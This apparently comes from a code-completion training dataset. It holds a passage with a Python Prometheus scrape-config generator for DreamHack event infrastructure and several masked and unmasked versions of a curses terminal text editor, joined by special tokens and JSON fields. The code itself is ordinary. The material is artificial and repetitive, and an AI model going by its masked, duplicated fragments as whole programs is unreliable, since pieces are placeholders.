"step-5": "# Copyright 2018 dhtech\n#\n# Use of this source code is governed by a BSD-style\n# license that can be found in the LICENSE file\nimport lib\nimport urlparse\nimport yaml\n\n\nMANIFEST_PATH = '/etc/manifest'\nHTTP_BASIC_AUTH = None\n\n\ndef blackbox(name, backend, targets, params,\n target='target', path='/probe', labels=None):\n labels = {} if labels is None else labels\n # Strip banned OSes\n banned_oses = ['debian']\n filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]\n return {\n 'job_name': name,\n 'metrics_path': path,\n 'params': params,\n 'static_configs': [{\n 'targets': sorted(filtered_targets),\n 'labels': labels\n }],\n 'relabel_configs': [{\n 'source_labels': ['__address__'],\n 'regex': '(.*)(:80)?',\n 'target_label': '__param_%s' % target,\n 'replacement': '${1}',\n }, {\n 'source_labels': ['__param_%s' % target],\n 'regex': '(.*)',\n 'target_label': 'instance',\n 'replacement': '${1}',\n }, {\n 'source_labels': [],\n 'regex': '.*',\n 'target_label': '__address__',\n 'replacement': backend,\n }]\n }\n\n\ndef generate_backend(host, local_services):\n scrape_configs = []\n scrape_configs.extend(local_services)\n domain = lib.get_domain(host)\n\n basic_auth = lib.read_secret('services/monitoring:login')\n\n # Find services that wants to be monitored\n manifest = yaml.load(file(MANIFEST_PATH).read())\n for package, spec in manifest['packages'].iteritems():\n if spec is None or 'monitor' not in spec:\n continue\n\n urls = (spec['monitor']['url']\n if isinstance(spec['monitor']['url'], dict) else\n {None: spec['monitor']['url']})\n for url_id, url_str in urls.iteritems():\n url = urlparse.urlparse(url_str)\n targets = []\n for target in sorted(\n lib.get_nodes_with_package(package, domain).keys()):\n targets.append(target if url.port is None else '%s:%d' % (\n target, url.port))\n scrape_config = {\n 'job_name': package + ('-%s' % url_id if url_id else ''),\n 'metrics_path': url.path,\n 'scheme': url.scheme,\n 
'static_configs': [\n {'targets': sorted(targets)}\n ],\n }\n if 'interval' in spec['monitor']:\n scrape_config['scrape_interval'] = spec['monitor']['interval']\n if 'labels' in spec['monitor']:\n scrape_config['static_configs'][0]['labels'] = spec['monitor']['labels']\n # Only allow authentication over https\n if spec['monitor'].get('auth', False) and url.scheme == 'https':\n scrape_config['basic_auth'] = basic_auth\n scrape_configs.append(scrape_config)\n\n # Layer specific monitoring\n layers = lib.get_layers(domain)\n\n snmp_nodes = {}\n ssh_nodes = {}\n for layer in layers:\n hosts = lib.get_nodes_with_layer(layer, domain)\n snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')\n ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')\n snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))\n ssh_nodes[layer] = [x+':22' for x in set(hosts) - set(ssh_mute)]\n\n # SNMP\n for layer in layers:\n # TODO(bluecmd): Use options for this\n if layer == 'access':\n snmp_host = 'snmp2.event.dreamhack.se'\n else:\n snmp_host = 'snmp1.event.dreamhack.se'\n snmp = blackbox(\n 'snmp_%s' % layer, snmp_host,\n snmp_nodes[layer], {'layer': [layer]}, labels={\n 'layer': layer})\n snmp['scrape_interval'] = '30s'\n snmp['scrape_timeout'] = '30s'\n scrape_configs.append(snmp)\n\n # SSH\n for layer in layers:\n for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:\n fqdn = ssh_host + '.event.dreamhack.se:9115'\n ssh = blackbox(\n 'ssh_%s_%s' % (layer, ssh_host), fqdn,\n ssh_nodes[layer], {'module': ['ssh_banner']}, labels={'layer': layer})\n ssh['scrape_interval'] = '30s'\n ssh['scrape_timeout'] = '30s'\n scrape_configs.append(ssh)\n\n # Add external service-discovery\n external = {\n 'job_name': 'external',\n 'file_sd_configs': [{\n 'files': ['/etc/prometheus/external/*.yaml'],\n }],\n }\n scrape_configs.append(external)\n\n if host.endswith('.event.dreamhack.se'):\n # Event should scrape puppet.tech.dreamhack.se to get information about\n # puppet runs\n puppet = {\n 
'job_name': 'puppet_runs',\n 'metrics_path': '/metrics',\n 'scrape_interval': '60s',\n 'scrape_timeout': '55s',\n 'static_configs': [{\n 'targets': ['puppet.tech.dreamhack.se:9100'],\n }],\n }\n scrape_configs.append(puppet)\n\n vcenter = {\n 'job_name': 'vmware_vcenter',\n 'metrics_path': '/metrics',\n 'scrape_interval': '60s',\n 'scrape_timeout': '55s',\n 'static_configs': [{\n 'targets': ['provision.event.dreamhack.se:9272'],\n }],\n }\n scrape_configs.append(vcenter)\n\n # Make sure that all metrics have a host label.\n # This rule uses the existing host label if there is one,\n # stripping of the port (which shouldn't be part of the host label anyway)\n # *or* if that label does not exist it uses the instance label\n # (again stripping of the port)\n relabel = {\n 'regex': r':?([^:]*):?.*',\n 'separator': ':',\n 'replacement': '${1}',\n 'source_labels': ['host', 'instance'],\n 'target_label': 'host',\n }\n\n mrc = 'metric_relabel_configs'\n for scrape in scrape_configs:\n if mrc in scrape:\n scrape[mrc].append(relabel)\n else:\n scrape[mrc] = [relabel]\n return {'scrape_configs': scrape_configs}\n\n\ndef requires(host, *args):\n return ['apache(ldap)']\n\n\ndef generate(host, *args):\n\n info = {}\n\n local_targets = []\n local_targets.append({\n 'job_name': 'prometheus',\n 'scheme': 'http',\n 'static_configs': [{'targets': ['localhost:9090']}]})\n info['prometheus'] = generate_backend(host, local_targets)\n\n # Get current event\n info['prometheus']['current_event'] = lib.get_current_event()\n\n return info\n\n# vim: ts=4: sts=4: sw=4: expandtab\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def main(screen, file_path):
setUpEnv()
text = readFileIfExist(file_path)
while 1:
try:
text = startEditing(screen, text)
printQuitOptions(screen)
char = screen.getch()
if char == KEY_ENTER_CODE:
writeToFile(file_path, text)
return 3, None
elif char == KEY_F9:
return 2, None
else:
pass
except KeyboardInterrupt:
return 1, None
except:
error_msg = traceback.format_exc()
return -1, error_msg
def setUpEnv():
use_default_colors()
init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)
def startEditing(screen, text):
cursor = Cursor(screen, BORDER_COLOR, text)
while 1:
char = screen.getch()
if char == KEY_F1:
break
elif char == TERMINAL_RESIZE_CODE:
cursor.resizeTextBox()
elif char == KEY_RIGHT:
cursor.moveRight()
elif char == KEY_LEFT:
cursor.moveLeft()
elif char == KEY_UP:
cursor.moveUp()
elif char == KEY_DOWN:
cursor.moveDown()
elif 31 < char < 127:
cursor.writeChar(char)
elif char == KEY_DELETE_CODE:
cursor.delete()
elif char == 10 or char == 13 or char == KEY_ENTER:
cursor.newLine()
elif char == KEY_TAB_CODE:
cursor.tab()
elif char == KEY_ESCAPE_CODE:
char = screen.getch()
if char == KEY_LEFT or char == 98:
cursor.moveToLeftMost()
elif char == KEY_RIGHT or char == 102:
cursor.moveToRightMost()
elif char == KEY_DELETE_CODE:
cursor.deleteWholeLine()
elif char == KEY_DOWN:
cursor.moveToRightBottomMost()
elif char == KEY_UP:
cursor.moveToRightUpMost()
else:
ungetch(char)
else:
cursor._writeString(str(char))
return cursor.getText()
def printQuitOptions(screen):
height, width = screen.getmaxyx()
screen.clear()
y = int(height / 2.5)
x = int(width / 2.5)
screen.addstr(y, x, 'Quit and Save (ENTER)')
screen.addstr(y + 1, x, 'Quit (F9)')
screen.addstr(y + 2, x, 'Go Back (Any Key)')
screen.refresh()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main(screen, file_path):
setUpEnv()
text = readFileIfExist(file_path)
while 1:
try:
text = startEditing(screen, text)
printQuitOptions(screen)
char = screen.getch()
if char == KEY_ENTER_CODE:
writeToFile(file_path, text)
return 3, None
elif char == KEY_F9:
return 2, None
else:
pass
except KeyboardInterrupt:
return 1, None
except:
error_msg = traceback.format_exc()
return -1, error_msg
def setUpEnv():
use_default_colors()
init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)
def startEditing(screen, text):
cursor = Cursor(screen, BORDER_COLOR, text)
while 1:
char = screen.getch()
if char == KEY_F1:
break
elif char == TERMINAL_RESIZE_CODE:
cursor.resizeTextBox()
elif char == KEY_RIGHT:
cursor.moveRight()
elif char == KEY_LEFT:
cursor.moveLeft()
elif char == KEY_UP:
cursor.moveUp()
elif char == KEY_DOWN:
cursor.moveDown()
elif 31 < char < 127:
cursor.writeChar(char)
elif char == KEY_DELETE_CODE:
cursor.delete()
elif char == 10 or char == 13 or char == KEY_ENTER:
cursor.newLine()
elif char == KEY_TAB_CODE:
cursor.tab()
elif char == KEY_ESCAPE_CODE:
char = screen.getch()
if char == KEY_LEFT or char == 98:
cursor.moveToLeftMost()
elif char == KEY_RIGHT or char == 102:
cursor.moveToRightMost()
elif char == KEY_DELETE_CODE:
cursor.deleteWholeLine()
elif char == KEY_DOWN:
cursor.moveToRightBottomMost()
elif char == KEY_UP:
cursor.moveToRightUpMost()
else:
ungetch(char)
else:
cursor._writeString(str(char))
return cursor.getText()
def printQuitOptions(screen):
height, width = screen.getmaxyx()
screen.clear()
y = int(height / 2.5)
x = int(width / 2.5)
screen.addstr(y, x, 'Quit and Save (ENTER)')
screen.addstr(y + 1, x, 'Quit (F9)')
screen.addstr(y + 2, x, 'Go Back (Any Key)')
screen.refresh()
def printExitMessage(exit_code, error_msg):
if exit_code == -1:
printToTerminal('Shit just happen, sorry.')
if error_msg:
printToTerminal(error_msg)
elif exit_code == 1:
printToTerminal('Quit, safe and sound.')
elif exit_code == 2:
printToTerminal('Quit without save.')
elif exit_code == 3:
printToTerminal('saved !')
elif exit_code == 4:
printToTerminal(VERSION)
elif exit_code == 5:
printToTerminal(
'======================== Welcome to Simple Editor X ========================'
, 'GREEN')
printToTerminal('')
printToTerminal('Arguments:')
printToTerminal(' -version')
printToTerminal(' -help')
printToTerminal(
' {file_name}, to start editing an existing or create a new file'
)
printToTerminal('')
printToTerminal('While using:')
printToTerminal(' Press F1, then ENTER to save')
printToTerminal('')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main(screen, file_path):
setUpEnv()
text = readFileIfExist(file_path)
while 1:
try:
text = startEditing(screen, text)
printQuitOptions(screen)
char = screen.getch()
if char == KEY_ENTER_CODE:
writeToFile(file_path, text)
return 3, None
elif char == KEY_F9:
return 2, None
else:
pass
except KeyboardInterrupt:
return 1, None
except:
error_msg = traceback.format_exc()
return -1, error_msg
def setUpEnv():
use_default_colors()
init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)
def startEditing(screen, text):
cursor = Cursor(screen, BORDER_COLOR, text)
while 1:
char = screen.getch()
if char == KEY_F1:
break
elif char == TERMINAL_RESIZE_CODE:
cursor.resizeTextBox()
elif char == KEY_RIGHT:
cursor.moveRight()
elif char == KEY_LEFT:
cursor.moveLeft()
elif char == KEY_UP:
cursor.moveUp()
elif char == KEY_DOWN:
cursor.moveDown()
elif 31 < char < 127:
cursor.writeChar(char)
elif char == KEY_DELETE_CODE:
cursor.delete()
elif char == 10 or char == 13 or char == KEY_ENTER:
cursor.newLine()
elif char == KEY_TAB_CODE:
cursor.tab()
elif char == KEY_ESCAPE_CODE:
char = screen.getch()
if char == KEY_LEFT or char == 98:
cursor.moveToLeftMost()
elif char == KEY_RIGHT or char == 102:
cursor.moveToRightMost()
elif char == KEY_DELETE_CODE:
cursor.deleteWholeLine()
elif char == KEY_DOWN:
cursor.moveToRightBottomMost()
elif char == KEY_UP:
cursor.moveToRightUpMost()
else:
ungetch(char)
else:
cursor._writeString(str(char))
return cursor.getText()
def printQuitOptions(screen):
height, width = screen.getmaxyx()
screen.clear()
y = int(height / 2.5)
x = int(width / 2.5)
screen.addstr(y, x, 'Quit and Save (ENTER)')
screen.addstr(y + 1, x, 'Quit (F9)')
screen.addstr(y + 2, x, 'Go Back (Any Key)')
screen.refresh()
def printExitMessage(exit_code, error_msg):
if exit_code == -1:
printToTerminal('Shit just happen, sorry.')
if error_msg:
printToTerminal(error_msg)
elif exit_code == 1:
printToTerminal('Quit, safe and sound.')
elif exit_code == 2:
printToTerminal('Quit without save.')
elif exit_code == 3:
printToTerminal('saved !')
elif exit_code == 4:
printToTerminal(VERSION)
elif exit_code == 5:
printToTerminal(
'======================== Welcome to Simple Editor X ========================'
, 'GREEN')
printToTerminal('')
printToTerminal('Arguments:')
printToTerminal(' -version')
printToTerminal(' -help')
printToTerminal(
' {file_name}, to start editing an existing or create a new file'
)
printToTerminal('')
printToTerminal('While using:')
printToTerminal(' Press F1, then ENTER to save')
printToTerminal('')
if __name__ == '__main__':
if len(sys.argv) != 2:
printToTerminal('This application take exactly 1 argument')
printToTerminal("type: 'sex -help' for more details")
exit(69)
error_msg = ''
exit_code = -1
arg = sys.argv[1].lower()
file_path = sys.argv[1]
if arg == '-v' or arg == '-version':
exit_code = 4
elif arg == '-h' or arg == '-help':
exit_code = 5
else:
exit_code, error_msg = wrapper(main, file_path)
printExitMessage(exit_code, error_msg)
<|reserved_special_token_1|>
import sys
import os
import traceback
from src.properties import *
from src.utils import *
from subprocess import call
from src.entity.cursor import Cursor
from curses import *
def main(screen, file_path):
setUpEnv()
text = readFileIfExist(file_path)
while 1:
try:
text = startEditing(screen, text)
printQuitOptions(screen)
char = screen.getch()
if char == KEY_ENTER_CODE:
writeToFile(file_path, text)
return 3, None
elif char == KEY_F9:
return 2, None
else:
pass
except KeyboardInterrupt:
return 1, None
except:
error_msg = traceback.format_exc()
return -1, error_msg
def setUpEnv():
use_default_colors()
init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)
def startEditing(screen, text):
cursor = Cursor(screen, BORDER_COLOR, text)
while 1:
char = screen.getch()
if char == KEY_F1:
break
elif char == TERMINAL_RESIZE_CODE:
cursor.resizeTextBox()
elif char == KEY_RIGHT:
cursor.moveRight()
elif char == KEY_LEFT:
cursor.moveLeft()
elif char == KEY_UP:
cursor.moveUp()
elif char == KEY_DOWN:
cursor.moveDown()
elif 31 < char < 127:
cursor.writeChar(char)
elif char == KEY_DELETE_CODE:
cursor.delete()
elif char == 10 or char == 13 or char == KEY_ENTER:
cursor.newLine()
elif char == KEY_TAB_CODE:
cursor.tab()
elif char == KEY_ESCAPE_CODE:
char = screen.getch()
if char == KEY_LEFT or char == 98:
cursor.moveToLeftMost()
elif char == KEY_RIGHT or char == 102:
cursor.moveToRightMost()
elif char == KEY_DELETE_CODE:
cursor.deleteWholeLine()
elif char == KEY_DOWN:
cursor.moveToRightBottomMost()
elif char == KEY_UP:
cursor.moveToRightUpMost()
else:
ungetch(char)
else:
cursor._writeString(str(char))
return cursor.getText()
def printQuitOptions(screen):
height, width = screen.getmaxyx()
screen.clear()
y = int(height / 2.5)
x = int(width / 2.5)
screen.addstr(y, x, 'Quit and Save (ENTER)')
screen.addstr(y + 1, x, 'Quit (F9)')
screen.addstr(y + 2, x, 'Go Back (Any Key)')
screen.refresh()
def printExitMessage(exit_code, error_msg):
if exit_code == -1:
printToTerminal('Shit just happen, sorry.')
if error_msg:
printToTerminal(error_msg)
elif exit_code == 1:
printToTerminal('Quit, safe and sound.')
elif exit_code == 2:
printToTerminal('Quit without save.')
elif exit_code == 3:
printToTerminal('saved !')
elif exit_code == 4:
printToTerminal(VERSION)
elif exit_code == 5:
printToTerminal(
'======================== Welcome to Simple Editor X ========================'
, 'GREEN')
printToTerminal('')
printToTerminal('Arguments:')
printToTerminal(' -version')
printToTerminal(' -help')
printToTerminal(
' {file_name}, to start editing an existing or create a new file'
)
printToTerminal('')
printToTerminal('While using:')
printToTerminal(' Press F1, then ENTER to save')
printToTerminal('')
if __name__ == '__main__':
if len(sys.argv) != 2:
printToTerminal('This application take exactly 1 argument')
printToTerminal("type: 'sex -help' for more details")
exit(69)
error_msg = ''
exit_code = -1
arg = sys.argv[1].lower()
file_path = sys.argv[1]
if arg == '-v' or arg == '-version':
exit_code = 4
elif arg == '-h' or arg == '-help':
exit_code = 5
else:
exit_code, error_msg = wrapper(main, file_path)
printExitMessage(exit_code, error_msg)
<|reserved_special_token_1|>
import sys
import os
import traceback
from src.properties import *
from src.utils import *
from subprocess import call
from src.entity.cursor import Cursor
from curses import *
def main(screen, file_path):
    """Run the editor loop on *screen* for the file at *file_path*.

    Returns a ``(exit_code, error_msg)`` tuple understood by
    ``printExitMessage``:
      3  -> saved and quit (ENTER on the quit menu),
      2  -> quit without saving (F9),
      1  -> interrupted with Ctrl+C,
      -1 -> unexpected error; ``error_msg`` holds the formatted traceback.
    ``error_msg`` is ``None`` for all non-error exits.
    """
    setUpEnv()
    text = readFileIfExist(file_path)
    while 1:
        try:
            text = startEditing(screen, text)
            printQuitOptions(screen)
            char = screen.getch()
            if char == KEY_ENTER_CODE:
                writeToFile(file_path, text)
                return 3, None
            elif char == KEY_F9:
                return 2, None
            else:
                pass  # any other key returns to editing
        except KeyboardInterrupt:  # quit properly, when user press Ctrl + C
            return 1, None
        except Exception:
            # Was a bare ``except:``, which would also intercept SystemExit
            # and GeneratorExit; only genuine runtime errors belong here.
            error_msg = traceback.format_exc()
            return -1, error_msg
def setUpEnv():
    """Prepare curses colors for the editor.

    ``use_default_colors`` must run first so that ``-1`` below means "the
    terminal's default background" when defining the border color pair.
    """
    use_default_colors()
    init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)
def startEditing(screen, text):
    """Run the interactive editing loop until the user presses F1.

    Each key press is dispatched to the Cursor, which owns the text buffer
    and the on-screen rendering.  Returns the edited text as a string.
    The order of the elif chain matters: specific key codes are checked
    before the printable-ASCII range test.
    """
    cursor = Cursor(screen, BORDER_COLOR, text)
    while 1:
        char = screen.getch()
        if char == KEY_F1:
            break  # F1 leaves editing and shows the quit menu
        elif char == TERMINAL_RESIZE_CODE:
            cursor.resizeTextBox()
        elif char == KEY_RIGHT:
            cursor.moveRight()
        elif char == KEY_LEFT:
            cursor.moveLeft()
        elif char == KEY_UP:
            cursor.moveUp()
        elif char == KEY_DOWN:
            cursor.moveDown()
        elif 31 < char < 127:
            # Printable ASCII range: insert the character at the cursor.
            cursor.writeChar(char)
        elif char == KEY_DELETE_CODE:
            cursor.delete()
        elif char == 10 or char == 13 or char == KEY_ENTER:
            # LF, CR or the curses ENTER key all start a new line.
            cursor.newLine()
        elif char == KEY_TAB_CODE:
            cursor.tab()
        elif char == KEY_ESCAPE_CODE:
            char = screen.getch()  # get the key pressed after cmd or alt
            if char == KEY_LEFT or char == 98:  # 98 and 102 are left and right keys produced while pressing alt, on mac terminal
                cursor.moveToLeftMost()
            elif char == KEY_RIGHT or char == 102:  # CMD + RIGHT
                cursor.moveToRightMost()
            elif char == KEY_DELETE_CODE:  # CMD + DELETE
                cursor.deleteWholeLine()
            elif char == KEY_DOWN:  # CMD + DOWN
                cursor.moveToRightBottomMost()
            elif char == KEY_UP:  # CMD + UP
                cursor.moveToRightUpMost()
            else:
                # A lone ESC produces the same prefix byte as CMD/ALT; push
                # the follow-up key back so the next iteration handles it.
                ungetch(char)
        else:
            # Unrecognized key code: render its numeric value (debug aid).
            cursor._writeString(str(char))
    return cursor.getText()
def printQuitOptions(screen):
    """Clear the screen and show the quit menu roughly centred on it."""
    rows, cols = screen.getmaxyx()
    screen.clear()
    top = int(rows / 2.5)
    left = int(cols / 2.5)
    labels = ("Quit and Save (ENTER)", "Quit (F9)", "Go Back (Any Key)")
    for offset, label in enumerate(labels):
        screen.addstr(top + offset, left, label)
    screen.refresh()
def printExitMessage(exit_code, error_msg):
    """Report the editor's exit status on the terminal.

    exit_code meanings: -1 crash (error_msg carries the traceback),
    1 Ctrl+C, 2 quit without saving, 3 saved, 4 -version, 5 -help.
    """
    one_liners = {
        1: "Quit, safe and sound.",
        2: "Quit without save.",
        3: "saved !",
    }
    if exit_code == -1:
        printToTerminal("Shit just happen, sorry.")
        if error_msg:
            printToTerminal(error_msg)
    elif exit_code in one_liners:
        printToTerminal(one_liners[exit_code])
    elif exit_code == 4:  # -version
        printToTerminal(VERSION)
    elif exit_code == 5:  # -help
        printToTerminal("======================== Welcome to Simple Editor X ========================", "GREEN")
        printToTerminal("")
        printToTerminal("Arguments:")
        printToTerminal("    -version")
        printToTerminal("    -help")
        printToTerminal("    {file_name}, to start editing an existing or create a new file")
        printToTerminal("")
        printToTerminal("While using:")
        printToTerminal("    Press F1, then ENTER to save")
        printToTerminal("")
if __name__ == "__main__":
    # Exactly one argument: either a flag or the path of the file to edit.
    if len(sys.argv) != 2:
        printToTerminal("This application take exactly 1 argument")
        printToTerminal("type: 'sex -help' for more details")
        exit(69)
    file_path = sys.argv[1]
    arg = file_path.lower()
    error_msg = ""
    if arg in ("-v", "-version"):
        exit_code = 4
    elif arg in ("-h", "-help"):
        exit_code = 5
    else:
        # curses.wrapper sets up/tears down the terminal around main().
        exit_code, error_msg = wrapper(main, file_path)
    printExitMessage(exit_code, error_msg)
|
flexible
|
{
"blob_id": "7a6d45ef87d93af9a15bd352b893164d3a36c399",
"index": 7545,
"step-1": "<mask token>\n\n\ndef main(screen, file_path):\n setUpEnv()\n text = readFileIfExist(file_path)\n while 1:\n try:\n text = startEditing(screen, text)\n printQuitOptions(screen)\n char = screen.getch()\n if char == KEY_ENTER_CODE:\n writeToFile(file_path, text)\n return 3, None\n elif char == KEY_F9:\n return 2, None\n else:\n pass\n except KeyboardInterrupt:\n return 1, None\n except:\n error_msg = traceback.format_exc()\n return -1, error_msg\n\n\ndef setUpEnv():\n use_default_colors()\n init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)\n\n\ndef startEditing(screen, text):\n cursor = Cursor(screen, BORDER_COLOR, text)\n while 1:\n char = screen.getch()\n if char == KEY_F1:\n break\n elif char == TERMINAL_RESIZE_CODE:\n cursor.resizeTextBox()\n elif char == KEY_RIGHT:\n cursor.moveRight()\n elif char == KEY_LEFT:\n cursor.moveLeft()\n elif char == KEY_UP:\n cursor.moveUp()\n elif char == KEY_DOWN:\n cursor.moveDown()\n elif 31 < char < 127:\n cursor.writeChar(char)\n elif char == KEY_DELETE_CODE:\n cursor.delete()\n elif char == 10 or char == 13 or char == KEY_ENTER:\n cursor.newLine()\n elif char == KEY_TAB_CODE:\n cursor.tab()\n elif char == KEY_ESCAPE_CODE:\n char = screen.getch()\n if char == KEY_LEFT or char == 98:\n cursor.moveToLeftMost()\n elif char == KEY_RIGHT or char == 102:\n cursor.moveToRightMost()\n elif char == KEY_DELETE_CODE:\n cursor.deleteWholeLine()\n elif char == KEY_DOWN:\n cursor.moveToRightBottomMost()\n elif char == KEY_UP:\n cursor.moveToRightUpMost()\n else:\n ungetch(char)\n else:\n cursor._writeString(str(char))\n return cursor.getText()\n\n\ndef printQuitOptions(screen):\n height, width = screen.getmaxyx()\n screen.clear()\n y = int(height / 2.5)\n x = int(width / 2.5)\n screen.addstr(y, x, 'Quit and Save (ENTER)')\n screen.addstr(y + 1, x, 'Quit (F9)')\n screen.addstr(y + 2, x, 'Go Back (Any Key)')\n screen.refresh()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main(screen, file_path):\n setUpEnv()\n text = readFileIfExist(file_path)\n while 1:\n try:\n text = startEditing(screen, text)\n printQuitOptions(screen)\n char = screen.getch()\n if char == KEY_ENTER_CODE:\n writeToFile(file_path, text)\n return 3, None\n elif char == KEY_F9:\n return 2, None\n else:\n pass\n except KeyboardInterrupt:\n return 1, None\n except:\n error_msg = traceback.format_exc()\n return -1, error_msg\n\n\ndef setUpEnv():\n use_default_colors()\n init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)\n\n\ndef startEditing(screen, text):\n cursor = Cursor(screen, BORDER_COLOR, text)\n while 1:\n char = screen.getch()\n if char == KEY_F1:\n break\n elif char == TERMINAL_RESIZE_CODE:\n cursor.resizeTextBox()\n elif char == KEY_RIGHT:\n cursor.moveRight()\n elif char == KEY_LEFT:\n cursor.moveLeft()\n elif char == KEY_UP:\n cursor.moveUp()\n elif char == KEY_DOWN:\n cursor.moveDown()\n elif 31 < char < 127:\n cursor.writeChar(char)\n elif char == KEY_DELETE_CODE:\n cursor.delete()\n elif char == 10 or char == 13 or char == KEY_ENTER:\n cursor.newLine()\n elif char == KEY_TAB_CODE:\n cursor.tab()\n elif char == KEY_ESCAPE_CODE:\n char = screen.getch()\n if char == KEY_LEFT or char == 98:\n cursor.moveToLeftMost()\n elif char == KEY_RIGHT or char == 102:\n cursor.moveToRightMost()\n elif char == KEY_DELETE_CODE:\n cursor.deleteWholeLine()\n elif char == KEY_DOWN:\n cursor.moveToRightBottomMost()\n elif char == KEY_UP:\n cursor.moveToRightUpMost()\n else:\n ungetch(char)\n else:\n cursor._writeString(str(char))\n return cursor.getText()\n\n\ndef printQuitOptions(screen):\n height, width = screen.getmaxyx()\n screen.clear()\n y = int(height / 2.5)\n x = int(width / 2.5)\n screen.addstr(y, x, 'Quit and Save (ENTER)')\n screen.addstr(y + 1, x, 'Quit (F9)')\n screen.addstr(y + 2, x, 'Go Back (Any Key)')\n screen.refresh()\n\n\ndef printExitMessage(exit_code, error_msg):\n if exit_code == -1:\n printToTerminal('Shit just happen, 
sorry.')\n if error_msg:\n printToTerminal(error_msg)\n elif exit_code == 1:\n printToTerminal('Quit, safe and sound.')\n elif exit_code == 2:\n printToTerminal('Quit without save.')\n elif exit_code == 3:\n printToTerminal('saved !')\n elif exit_code == 4:\n printToTerminal(VERSION)\n elif exit_code == 5:\n printToTerminal(\n '======================== Welcome to Simple Editor X ========================'\n , 'GREEN')\n printToTerminal('')\n printToTerminal('Arguments:')\n printToTerminal(' -version')\n printToTerminal(' -help')\n printToTerminal(\n ' {file_name}, to start editing an existing or create a new file'\n )\n printToTerminal('')\n printToTerminal('While using:')\n printToTerminal(' Press F1, then ENTER to save')\n printToTerminal('')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main(screen, file_path):\n setUpEnv()\n text = readFileIfExist(file_path)\n while 1:\n try:\n text = startEditing(screen, text)\n printQuitOptions(screen)\n char = screen.getch()\n if char == KEY_ENTER_CODE:\n writeToFile(file_path, text)\n return 3, None\n elif char == KEY_F9:\n return 2, None\n else:\n pass\n except KeyboardInterrupt:\n return 1, None\n except:\n error_msg = traceback.format_exc()\n return -1, error_msg\n\n\ndef setUpEnv():\n use_default_colors()\n init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)\n\n\ndef startEditing(screen, text):\n cursor = Cursor(screen, BORDER_COLOR, text)\n while 1:\n char = screen.getch()\n if char == KEY_F1:\n break\n elif char == TERMINAL_RESIZE_CODE:\n cursor.resizeTextBox()\n elif char == KEY_RIGHT:\n cursor.moveRight()\n elif char == KEY_LEFT:\n cursor.moveLeft()\n elif char == KEY_UP:\n cursor.moveUp()\n elif char == KEY_DOWN:\n cursor.moveDown()\n elif 31 < char < 127:\n cursor.writeChar(char)\n elif char == KEY_DELETE_CODE:\n cursor.delete()\n elif char == 10 or char == 13 or char == KEY_ENTER:\n cursor.newLine()\n elif char == KEY_TAB_CODE:\n cursor.tab()\n elif char == KEY_ESCAPE_CODE:\n char = screen.getch()\n if char == KEY_LEFT or char == 98:\n cursor.moveToLeftMost()\n elif char == KEY_RIGHT or char == 102:\n cursor.moveToRightMost()\n elif char == KEY_DELETE_CODE:\n cursor.deleteWholeLine()\n elif char == KEY_DOWN:\n cursor.moveToRightBottomMost()\n elif char == KEY_UP:\n cursor.moveToRightUpMost()\n else:\n ungetch(char)\n else:\n cursor._writeString(str(char))\n return cursor.getText()\n\n\ndef printQuitOptions(screen):\n height, width = screen.getmaxyx()\n screen.clear()\n y = int(height / 2.5)\n x = int(width / 2.5)\n screen.addstr(y, x, 'Quit and Save (ENTER)')\n screen.addstr(y + 1, x, 'Quit (F9)')\n screen.addstr(y + 2, x, 'Go Back (Any Key)')\n screen.refresh()\n\n\ndef printExitMessage(exit_code, error_msg):\n if exit_code == -1:\n printToTerminal('Shit just happen, 
sorry.')\n if error_msg:\n printToTerminal(error_msg)\n elif exit_code == 1:\n printToTerminal('Quit, safe and sound.')\n elif exit_code == 2:\n printToTerminal('Quit without save.')\n elif exit_code == 3:\n printToTerminal('saved !')\n elif exit_code == 4:\n printToTerminal(VERSION)\n elif exit_code == 5:\n printToTerminal(\n '======================== Welcome to Simple Editor X ========================'\n , 'GREEN')\n printToTerminal('')\n printToTerminal('Arguments:')\n printToTerminal(' -version')\n printToTerminal(' -help')\n printToTerminal(\n ' {file_name}, to start editing an existing or create a new file'\n )\n printToTerminal('')\n printToTerminal('While using:')\n printToTerminal(' Press F1, then ENTER to save')\n printToTerminal('')\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n printToTerminal('This application take exactly 1 argument')\n printToTerminal(\"type: 'sex -help' for more details\")\n exit(69)\n error_msg = ''\n exit_code = -1\n arg = sys.argv[1].lower()\n file_path = sys.argv[1]\n if arg == '-v' or arg == '-version':\n exit_code = 4\n elif arg == '-h' or arg == '-help':\n exit_code = 5\n else:\n exit_code, error_msg = wrapper(main, file_path)\n printExitMessage(exit_code, error_msg)\n",
